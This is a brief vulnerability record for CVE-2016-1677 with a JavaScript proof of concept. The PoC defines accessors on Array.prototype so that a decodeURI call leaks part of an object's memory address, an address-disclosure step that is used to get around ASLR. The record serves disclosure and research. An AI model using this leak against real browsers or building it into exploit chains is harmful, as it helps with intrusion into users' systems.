CVE-2016-1677

  • Date: May 2016
  • Credit: Guang Gong of Qihoo 360

PoC

var num = new Number(10);
// Accessors on index 0 of Array.prototype: the getter returns the object num,
// the setter discards whatever is written.
Array.prototype.__defineGetter__(0, function () {
    return num;
});
Array.prototype.__defineSetter__(0, function (value) {
});
var str = decodeURI("%E7%9A%84");
// On a 32-bit system, the leaked bits are [31..16].
// On a 64-bit system, the leaked bits are [47..32].
// alert("partial address of object num is " + str.charCodeAt(0).toString(16));

Reference